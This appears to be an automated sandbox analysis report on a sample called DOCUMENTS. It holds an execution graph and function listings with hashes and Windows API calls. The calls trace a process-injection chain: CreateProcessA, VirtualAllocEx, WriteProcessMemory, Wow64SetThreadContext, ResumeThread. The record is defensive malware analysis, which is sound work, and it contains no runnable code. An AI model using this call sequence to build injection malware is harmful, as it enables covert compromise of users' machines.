                                                execution_graph 27022 70dfb3d 27023 70dfb43 27022->27023 27024 70dfd4c 27023->27024 27028 71b2831 27023->27028 27044 71b28a6 27023->27044 27061 71b2840 27023->27061 27029 71b2833 27028->27029 27037 71b2862 27029->27037 27077 71b2d08 27029->27077 27087 71b2d29 27029->27087 27092 71b2f69 27029->27092 27097 71b2d95 27029->27097 27111 71b2e3e 27029->27111 27116 71b2e5f 27029->27116 27124 71b2ddf 27029->27124 27139 71b3239 27029->27139 27144 71b2c99 27029->27144 27148 71b33fa 27029->27148 27153 71b2f84 27029->27153 27163 71b3442 27029->27163 27168 71b2ecf 27029->27168 27037->27024 27045 71b2834 27044->27045 27046 71b28a9 27044->27046 27047 71b33fa 2 API calls 27045->27047 27048 71b2c99 2 API calls 27045->27048 27049 71b3239 2 API calls 27045->27049 27050 71b2862 27045->27050 27051 71b2ddf 6 API calls 27045->27051 27052 71b2e5f 4 API calls 27045->27052 27053 71b2e3e 2 API calls 27045->27053 27054 71b2d95 4 API calls 27045->27054 27055 71b2f69 2 API calls 27045->27055 27056 71b2d29 2 API calls 27045->27056 27057 71b2d08 4 API calls 27045->27057 27058 71b2ecf 6 API calls 27045->27058 27059 71b3442 2 API calls 27045->27059 27060 71b2f84 4 API calls 27045->27060 27046->27024 27047->27050 27048->27050 27049->27050 27050->27024 27051->27050 27052->27050 27053->27050 27054->27050 27055->27050 27056->27050 27057->27050 27058->27050 27059->27050 27060->27050 27062 71b285a 27061->27062 27063 71b33fa 2 API calls 27062->27063 27064 71b2c99 2 API calls 27062->27064 27065 71b3239 2 API calls 27062->27065 27066 71b2ddf 6 API calls 27062->27066 27067 71b2e5f 4 API calls 27062->27067 27068 71b2e3e 2 API calls 27062->27068 27069 71b2d95 4 API calls 27062->27069 27070 71b2f69 2 API calls 27062->27070 27071 71b2d29 2 API calls 27062->27071 27072 71b2d08 4 API calls 27062->27072 27073 71b2ecf 6 API calls 27062->27073 27074 71b2862 27062->27074 27075 71b3442 2 API calls 27062->27075 27076 71b2f84 4 API calls 27062->27076 27063->27074 27064->27074 27065->27074 27066->27074 27067->27074 27068->27074 27069->27074 27070->27074 27071->27074 27072->27074 27073->27074 27074->27024 27075->27074 27076->27074 27078 71b2d11 27077->27078 27079 71b2d47 27078->27079 27081 71b2e45 27078->27081 27182 70dee58 27079->27182 27186 70dee60 27079->27186 27080 71b353b 27190 70deff8 27081->27190 27194 70deff0 27081->27194 27082 71b2d62 27088 71b2d2f 27087->27088 27089 71b358f 27088->27089 27198 70de978 27088->27198 27202 70de970 27088->27202 27089->27037 27093 71b300b 27092->27093 27095 70deff8 WriteProcessMemory 27093->27095 27096 70deff0 WriteProcessMemory 27093->27096 27094 71b35c4 27095->27094 27096->27094 27098 71b3240 27097->27098 27099 71b2d11 27097->27099 27103 71b2d62 27098->27103 27109 70deff8 WriteProcessMemory 27098->27109 27110 70deff0 WriteProcessMemory 27098->27110 27100 71b2e45 27099->27100 27101 71b2d47 27099->27101 27105 70deff8 WriteProcessMemory 27100->27105 27106 70deff0 WriteProcessMemory 27100->27106 27107 70dee58 Wow64SetThreadContext 27101->27107 27108 70dee60 Wow64SetThreadContext 27101->27108 27102 71b353b 27104 71b3665 27105->27102 27106->27102 27107->27103 27108->27103 27109->27104 27110->27104 27112 71b2e44 27111->27112 27114 70deff8 WriteProcessMemory 27112->27114 27115 70deff0 WriteProcessMemory 27112->27115 27113 71b353b 27114->27113 27115->27113 27117 71b2e65 27116->27117 27118 71b2d40 27117->27118 27122 70dee58 Wow64SetThreadContext 27117->27122 27123 70dee60 Wow64SetThreadContext 27117->27123 27119 71b358f 27118->27119 27120 70de978 ResumeThread 27118->27120 27121 70de970 ResumeThread 27118->27121 27119->27037 27120->27118 27121->27118 27122->27118 27123->27118 27125 71b2def 27124->27125 27128 71b2d8f 27124->27128 27126 71b2d11 27125->27126 27206 70def30 27125->27206 27210 70def38 27125->27210 27127 71b31a4 27126->27127 27129 71b2d47 27126->27129 27130 71b2e45 27126->27130 27127->27037 27128->27128 27135 70dee58 Wow64SetThreadContext 27129->27135 27136 70dee60 Wow64SetThreadContext 27129->27136 27137 70deff8 WriteProcessMemory 27130->27137 27138 70deff0 WriteProcessMemory 27130->27138 27131 71b353b 27132 71b2d62 27135->27132 27136->27132 27137->27131 27138->27131 27140 71b323f 27139->27140 27142 70deff8 WriteProcessMemory 27140->27142 27143 70deff0 WriteProcessMemory 27140->27143 27141 71b3665 27142->27141 27143->27141 27214 70df676 27144->27214 27218 70df680 27144->27218 27149 71b3400 27148->27149 27222 70df0e0 27149->27222 27226 70df0e8 27149->27226 27150 71b3423 27150->27037 27154 71b2d11 27153->27154 27155 71b2d47 27154->27155 27156 71b2e45 27154->27156 27157 71b2d62 27154->27157 27161 70dee58 Wow64SetThreadContext 27155->27161 27162 70dee60 Wow64SetThreadContext 27155->27162 27159 70deff8 WriteProcessMemory 27156->27159 27160 70deff0 WriteProcessMemory 27156->27160 27158 71b353b 27159->27158 27160->27158 27161->27157 27162->27157 27164 71b2d40 27163->27164 27165 71b358f 27164->27165 27166 70de978 ResumeThread 27164->27166 27167 70de970 ResumeThread 27164->27167 27165->27037 27166->27164 27167->27164 27169 71b2dec 27168->27169 27180 70def38 VirtualAllocEx 27169->27180 27181 70def30 VirtualAllocEx 27169->27181 27170 71b2d11 27171 71b31a4 27170->27171 27172 71b2d47 27170->27172 27173 71b2e45 27170->27173 27171->27037 27176 70dee58 Wow64SetThreadContext 27172->27176 27177 70dee60 Wow64SetThreadContext 27172->27177 27178 70deff8 WriteProcessMemory 27173->27178 27179 70deff0 WriteProcessMemory 27173->27179 27174 71b353b 27175 71b2d62 27176->27175 27177->27175 27178->27174 27179->27174 27180->27170 27181->27170 27183 70deea5 Wow64SetThreadContext 27182->27183 27185 70deeed 27183->27185 27185->27082 27187 70deea5 Wow64SetThreadContext 27186->27187 27189 70deeed 27187->27189 27189->27082 27191 70df040 WriteProcessMemory 27190->27191 27193 70df097 27191->27193 27193->27080 27195 70df040 WriteProcessMemory 27194->27195 27197 70df097 27195->27197 27197->27080 27199 70de9b8 ResumeThread 27198->27199 27201 70de9e9 27199->27201 27201->27088 27203 70de9b8 ResumeThread 27202->27203 27205 70de9e9 27203->27205 27205->27088 27207 70def78 VirtualAllocEx 27206->27207 27209 70defb5 27207->27209 27209->27126 27211 70def78 VirtualAllocEx 27210->27211 27213 70defb5 27211->27213 27213->27126 27215 70df709 CreateProcessA 27214->27215 27217 70df8cb 27215->27217 27219 70df709 CreateProcessA 27218->27219 27221 70df8cb 27219->27221 27223 70df133 ReadProcessMemory 27222->27223 27225 70df177 27223->27225 27225->27150 27227 70df133 ReadProcessMemory 27226->27227 27229 70df177 27227->27229 27229->27150 27001 71b3bd8 27002 71b3d63 27001->27002 27003 71b3bfe 27001->27003 27003->27002 27006 71b3e58 PostMessageW 27003->27006 27008 71b3e53 PostMessageW 27003->27008 27007 71b3ec4 27006->27007 27007->27003 27009 71b3ec4 27008->27009 27009->27003 27012 11bd378 27013 11bd3be GetCurrentProcess 27012->27013 27015 11bd409 27013->27015 27016 11bd410 GetCurrentThread 27013->27016 27015->27016 27017 11bd44d GetCurrentProcess 27016->27017 27018 11bd446 27016->27018 27019 11bd483 GetCurrentThreadId 27017->27019 27018->27017 27021 11bd4dc 27019->27021 27230 11b4668 27231 11b4672 27230->27231 27235 11b4759 27230->27235 27240 11b4218 27231->27240 27233 11b468d 27236 11b477d 27235->27236 27244 11b4859 27236->27244 27248 11b4868 27236->27248 27241 11b4223 27240->27241 27256 11b5c4c 27241->27256 27243 11b6f8d 27243->27233 27246 11b488f 27244->27246 27245 11b496c 27245->27245 27246->27245 27252 11b44e0 27246->27252 27250 11b488f 27248->27250 27249 11b496c 27249->27249 27250->27249 27251 11b44e0 CreateActCtxA 27250->27251 27251->27249 27253 11b58f8 CreateActCtxA 27252->27253 27255 11b59bb 27253->27255 27257 11b5c57 27256->27257 27260 11b5c7c 27257->27260 27259 11b7035 27259->27243 27261 11b5c87 27260->27261 27264 11b5cac 27261->27264 27263 11b711a 27263->27259 27265 11b5cb7 27264->27265 27268 11b5cdc 27265->27268 27267 11b720d 27267->27263 27269 11b5ce7 27268->27269 27270 11b850b 27269->27270 27272 11babb8 27269->27272 27270->27267 27276 11babdf 27272->27276 27281 11babf0 27272->27281 27273 11babce 27273->27270 27277 11babf0 27276->27277 27285 11bace8 27277->27285 27293 11bacd9 27277->27293 27278 11babff 27278->27273 27283 11bacd9 2 API calls 27281->27283 27284 11bace8 2 API calls 27281->27284 27282 11babff 27282->27273 27283->27282 27284->27282 27286 11bacf9 27285->27286 27287 11bad1c 27285->27287 27286->27287 27301 11baf71 27286->27301 27305 11baf80 27286->27305 27287->27278 27288 11bad14 27288->27287 27289 11baf20 GetModuleHandleW 27288->27289 27290 11baf4d 27289->27290 27290->27278 27294 11bacf9 27293->27294 27295 11bad1c 27293->27295 27294->27295 27299 11baf71 LoadLibraryExW 27294->27299 27300 11baf80 LoadLibraryExW 27294->27300 27295->27278 27296 11bad14 27296->27295 27297 11baf20 GetModuleHandleW 27296->27297 27298 11baf4d 27297->27298 27298->27278 27299->27296 27300->27296 27302 11baf94 27301->27302 27303 11bafb9 27302->27303 27309 11ba0a8 27302->27309 27303->27288 27306 11baf94 27305->27306 27307 11bafb9 27306->27307 27308 11ba0a8 LoadLibraryExW 27306->27308 27307->27288 27308->27307 27310 11bb160 LoadLibraryExW 27309->27310 27312 11bb1d9 27310->27312 27312->27303 27010 11bd5c0 DuplicateHandle 27011 11bd656 27010->27011 27313 11bce60 27315 11bce6d 27313->27315 27314 11bcea7 27315->27314 27317 11bb6c0 27315->27317 27318 11bb6cb 27317->27318 27319 11bdbb8 27318->27319 27321 11bcfc4 27318->27321 27322 11bcfcf 27321->27322 27323 11b5cdc 3 API calls 27322->27323 27324 11bdc27 27323->27324 27324->27319

                                                Executed Functions

                                                Function 070D1330 Relevance: .2, Instructions: 237COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 296a40a3bac7b2483402b693190ccd16f2c6aff955496e38f9cf4f3be253429d
                                                • Instruction ID: e891f5f13a6b4187dae27955a4c3bef7d0ac4cb5ac7e72c30bce9b8fa37f19d9
                                                • Opcode Fuzzy Hash: 296a40a3bac7b2483402b693190ccd16f2c6aff955496e38f9cf4f3be253429d
                                                • Instruction Fuzzy Hash: 4A9128B0D1530DDBCB08CFA6E58499DFBB2EB8A301F20A519E416B7224DB749946CF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070D1028 Relevance: .2, Instructions: 204COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68fa676d81eaa3066b259bb0d570343a5baac7556c642c98b2790e161ee4fdee
                                                • Instruction ID: 23966823ddc07901e17f16b15d00b89641e2ac9c3823c88744f61e254346a841
                                                • Opcode Fuzzy Hash: 68fa676d81eaa3066b259bb0d570343a5baac7556c642c98b2790e161ee4fdee
                                                • Instruction Fuzzy Hash: 3F8100B4E14259DFCB04EFA9C880AEEFBB2FB89200F21961AD511A7254DB749912CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070D1018 Relevance: .2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc383ca408c4d6d6be45cbaba47375a1ac677b07897b43eef9081c279280135e
                                                • Instruction ID: 730be6de9f1bda136c05f0a7c9ad94fcf83ac0c02abf3d043169d45ec4c2e66d
                                                • Opcode Fuzzy Hash: bc383ca408c4d6d6be45cbaba47375a1ac677b07897b43eef9081c279280135e
                                                • Instruction Fuzzy Hash: EC8112B4E14259CFCB04EFA9C880AEEBBB2FF89200F10995AD511E7254DB789912CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B2DDF Relevance: .1, Instructions: 104COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362943300.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_71b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 125e17916265c620b893e1f77b63dbb29eb293e80bf363d5ed04ed9e4e3957fd
                                                • Instruction ID: 498c511ee0487e7548ff63a18eb4e5d5839b2ad0aad85facaad228bdaa5f18db
                                                • Opcode Fuzzy Hash: 125e17916265c620b893e1f77b63dbb29eb293e80bf363d5ed04ed9e4e3957fd
                                                • Instruction Fuzzy Hash: 97412CB5908218DFCB65CF64C894BECBBB9FB4E300F5190DAD419A7291C7319A99CF00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070D964F Relevance: .1, Instructions: 64COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 371327b60d0da769f40c80396b4543d55090167c2ff3c765c0f5a92257337ce7
                                                • Instruction ID: e35cae1b1734cfeb0d57f9a1d15e8f4fb1aa76a2c3356f1b330b4692cc12b0cc
                                                • Opcode Fuzzy Hash: 371327b60d0da769f40c80396b4543d55090167c2ff3c765c0f5a92257337ce7
                                                • Instruction Fuzzy Hash: BD21C4B1D056189BEB19CFAAC8447DEBBB6AFC9300F04C16A9408A6254DB7419458FA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070D9660 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72da0eae3e6b681268aa9b2a268a983df6fa6c5dba112e9a7c8e786ba7201247
                                                • Instruction ID: 7b847d18d6828ce851df118bca89274038a56b7fede015491c3d46506f23e08f
                                                • Opcode Fuzzy Hash: 72da0eae3e6b681268aa9b2a268a983df6fa6c5dba112e9a7c8e786ba7201247
                                                • Instruction Fuzzy Hash: A521E2B1D107189BEB18CFABC9447DEFAF7AFC9300F14C16AD418A6268DB7419468F90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B2FD8 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362943300.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_71b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 63734c6dd6572685ec0e22d8398e5177762f577330335a7773878c7e1bf6c219
                                                • Instruction ID: 2187f63f70210d187822fd56fb5b272e18f105e7512492a586b81847dfe91e57
                                                • Opcode Fuzzy Hash: 63734c6dd6572685ec0e22d8398e5177762f577330335a7773878c7e1bf6c219
                                                • Instruction Fuzzy Hash: 8FE086B4D1C104DFC3545F30548C5F5BBB9AF0F302F0A11A5D40A97642E73095118E19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B2D8A Relevance: .0, Instructions: 21COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362943300.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_71b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a791f7b00bf0b9ef4165dad3a14e7252a3e780fd3bb5d3969a7fb39628716a81
                                                • Instruction ID: 681cc276e3ccd714550c7145a6cac6df0ca0f8e6645ff9852be458c3e7dd79de
                                                • Opcode Fuzzy Hash: a791f7b00bf0b9ef4165dad3a14e7252a3e780fd3bb5d3969a7fb39628716a81
                                                • Instruction Fuzzy Hash: 3BE0ECB481D248DFC729DF64D4949F8BBB8EB4F300F02609AC90A97296D731AA54CE05
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011BD378 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 011BD3F6
                                                • GetCurrentThread.KERNEL32 ref: 011BD433
                                                • GetCurrentProcess.KERNEL32 ref: 011BD470
                                                • GetCurrentThreadId.KERNEL32 ref: 011BD4C9
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 6101aa70b72123a5a79d1a173627791e9200b640a1625d3894945a8f59343c6e
                                                • Instruction ID: 9846f623f1185bd067352181471e9f75264730e52874b25c20d87f71b6a1f079
                                                • Opcode Fuzzy Hash: 6101aa70b72123a5a79d1a173627791e9200b640a1625d3894945a8f59343c6e
                                                • Instruction Fuzzy Hash: F65166B09007498FDB18CFAAD589BDEBBF1EF88308F208459E009A7390D7786945CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DF676 Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 21 70df676-70df715 23 70df74e-70df76e 21->23 24 70df717-70df721 21->24 31 70df7a7-70df7d6 23->31 32 70df770-70df77a 23->32 24->23 25 70df723-70df725 24->25 26 70df748-70df74b 25->26 27 70df727-70df731 25->27 26->23 29 70df735-70df744 27->29 30 70df733 27->30 29->29 33 70df746 29->33 30->29 40 70df80f-70df8c9 CreateProcessA 31->40 41 70df7d8-70df7e2 31->41 32->31 34 70df77c-70df77e 32->34 33->26 35 70df7a1-70df7a4 34->35 36 70df780-70df78a 34->36 35->31 38 70df78c 36->38 39 70df78e-70df79d 36->39 38->39 39->39 42 70df79f 39->42 52 70df8cb-70df8d1 40->52 53 70df8d2-70df958 40->53 41->40 43 70df7e4-70df7e6 41->43 42->35 45 70df809-70df80c 43->45 46 70df7e8-70df7f2 43->46 45->40 47 70df7f4 46->47 48 70df7f6-70df805 46->48 47->48 48->48 50 70df807 48->50 50->45 52->53 63 70df968-70df96c 53->63 64 70df95a-70df95e 53->64 66 70df97c-70df980 63->66 67 70df96e-70df972 63->67 64->63 65 70df960 64->65 65->63 68 70df990-70df994 66->68 69 70df982-70df986 66->69 67->66 70 70df974 67->70 72 70df9a6-70df9ad 68->72 73 70df996-70df99c 68->73 69->68 71 70df988 69->71 70->66 71->68 74 70df9af-70df9be 72->74 75 70df9c4 72->75 73->72 74->75 77 70df9c5 75->77 77->77
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070DF8B6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 183260d983c97ebd38fc336894c89c0e1acef99bec11b14825a521cbd88e3ac6
                                                • Instruction ID: 260f392500d531085d6c246a1ee1da34cd82c2fc4c978adb87e95bdc3a5a4f2c
                                                • Opcode Fuzzy Hash: 183260d983c97ebd38fc336894c89c0e1acef99bec11b14825a521cbd88e3ac6
                                                • Instruction Fuzzy Hash: C7A139B1D0031A9FEB64DF68C8417EDBBB2BF48310F148669E859A7240DB74A985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DF680 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 78 70df680-70df715 80 70df74e-70df76e 78->80 81 70df717-70df721 78->81 88 70df7a7-70df7d6 80->88 89 70df770-70df77a 80->89 81->80 82 70df723-70df725 81->82 83 70df748-70df74b 82->83 84 70df727-70df731 82->84 83->80 86 70df735-70df744 84->86 87 70df733 84->87 86->86 90 70df746 86->90 87->86 97 70df80f-70df8c9 CreateProcessA 88->97 98 70df7d8-70df7e2 88->98 89->88 91 70df77c-70df77e 89->91 90->83 92 70df7a1-70df7a4 91->92 93 70df780-70df78a 91->93 92->88 95 70df78c 93->95 96 70df78e-70df79d 93->96 95->96 96->96 99 70df79f 96->99 109 70df8cb-70df8d1 97->109 110 70df8d2-70df958 97->110 98->97 100 70df7e4-70df7e6 98->100 99->92 102 70df809-70df80c 100->102 103 70df7e8-70df7f2 100->103 102->97 104 70df7f4 103->104 105 70df7f6-70df805 103->105 104->105 105->105 107 70df807 105->107 107->102 109->110 120 70df968-70df96c 110->120 121 70df95a-70df95e 110->121 123 70df97c-70df980 120->123 124 70df96e-70df972 120->124 121->120 122 70df960 121->122 122->120 125 70df990-70df994 123->125 126 70df982-70df986 123->126 124->123 127 70df974 124->127 129 70df9a6-70df9ad 125->129 130 70df996-70df99c 125->130 126->125 128 70df988 126->128 127->123 128->125 131 70df9af-70df9be 129->131 132 70df9c4 129->132 130->129 131->132 134 70df9c5 132->134 134->134
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070DF8B6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: f26454ac8866447af65762ef72dbdd461598abd6af0260d430f9a9d63fbf61de
                                                • Instruction ID: ae8d3fee8ff727dadbb4fdc401f76dcb43d024c038e26342009c9c16ee2a9706
                                                • Opcode Fuzzy Hash: f26454ac8866447af65762ef72dbdd461598abd6af0260d430f9a9d63fbf61de
                                                • Instruction Fuzzy Hash: 8C9139B1D0031A9FEB64DF68C841BDDBBF2BF48310F148669E819A7240DB74A985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011BACE8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 135 11bace8-11bacf7 136 11bacf9-11bad06 call 11b9314 135->136 137 11bad23-11bad27 135->137 144 11bad08 136->144 145 11bad1c 136->145 138 11bad3b-11bad7c 137->138 139 11bad29-11bad33 137->139 146 11bad89-11bad97 138->146 147 11bad7e-11bad86 138->147 139->138 190 11bad0e call 11baf71 144->190 191 11bad0e call 11baf80 144->191 145->137 148 11badbb-11badbd 146->148 149 11bad99-11bad9e 146->149 147->146 152 11badc0-11badc7 148->152 153 11bada9 149->153 154 11bada0-11bada7 call 11ba050 149->154 150 11bad14-11bad16 150->145 151 11bae58-11baf18 150->151 185 11baf1a-11baf1d 151->185 186 11baf20-11baf4b GetModuleHandleW 151->186 155 11badc9-11badd1 152->155 156 11badd4-11baddb 152->156 157 11badab-11badb9 153->157 154->157 155->156 159 11bade8-11badf1 call 11ba060 156->159 160 11baddd-11bade5 156->160 157->152 166 11badfe-11bae03 159->166 167 11badf3-11badfb 159->167 160->159 169 11bae21-11bae25 166->169 170 11bae05-11bae0c 166->170 167->166 172 11bae2b-11bae2e 169->172 170->169 171 11bae0e-11bae1e call 11ba070 call 11ba080 170->171 171->169 175 11bae51-11bae57 172->175 176 11bae30-11bae4e 172->176 176->175 185->186 187 11baf4d-11baf53 186->187 188 11baf54-11baf68 186->188 187->188 190->150 191->150
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 011BAF3E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 4b56f2a8d6c9b214c900f52a5178bbe4d9db4f57f9db01c428417a41889d3140
                                                • Instruction ID: 267109c0b929076d2e32600f684816129e48a534e871a1fd33baccf8abd5c415
                                                • Opcode Fuzzy Hash: 4b56f2a8d6c9b214c900f52a5178bbe4d9db4f57f9db01c428417a41889d3140
                                                • Instruction Fuzzy Hash: AB713870A00B058FE728DF29E49479ABBF1FF88304F008A2DE58AD7A50D775E945CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011B58EC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 192 11b58ec-11b59b9 CreateActCtxA 194 11b59bb-11b59c1 192->194 195 11b59c2-11b5a1c 192->195 194->195 202 11b5a2b-11b5a2f 195->202 203 11b5a1e-11b5a21 195->203 204 11b5a31-11b5a3d 202->204 205 11b5a40 202->205 203->202 204->205 207 11b5a41 205->207 207->207
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 011B59A9
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 4043057e127d9fb5489fe7e43cc9fc6bd38db3b69b7d7de9f6bd5111ecde633e
                                                • Instruction ID: 2de957149bb3d18869e779ad9fbfe87c7ae5d9cce3abc1d70634ea542072cc1d
                                                • Opcode Fuzzy Hash: 4043057e127d9fb5489fe7e43cc9fc6bd38db3b69b7d7de9f6bd5111ecde633e
                                                • Instruction Fuzzy Hash: 6441C2B0C00719CFEB24DFA9C884BDDBBB6BF49304F24816AD409AB251D7756946CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011B44E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 208 11b44e0-11b59b9 CreateActCtxA 211 11b59bb-11b59c1 208->211 212 11b59c2-11b5a1c 208->212 211->212 219 11b5a2b-11b5a2f 212->219 220 11b5a1e-11b5a21 212->220 221 11b5a31-11b5a3d 219->221 222 11b5a40 219->222 220->219 221->222 224 11b5a41 222->224 224->224
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 011B59A9
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: ce8f66364b58fc963fabe6f7198f0be64c1ca6a75361c0333d6b17c5095fc47f
                                                • Instruction ID: a3e17d347aa1112397f9b763b1d4a96675abcd450e38af1a4b4a1ad0878be640
                                                • Opcode Fuzzy Hash: ce8f66364b58fc963fabe6f7198f0be64c1ca6a75361c0333d6b17c5095fc47f
                                                • Instruction Fuzzy Hash: 4A41C570C00719CBEB64DFA9C884BDEBBB6BF49304F24806AD419AB251D7756946CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DEFF0 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
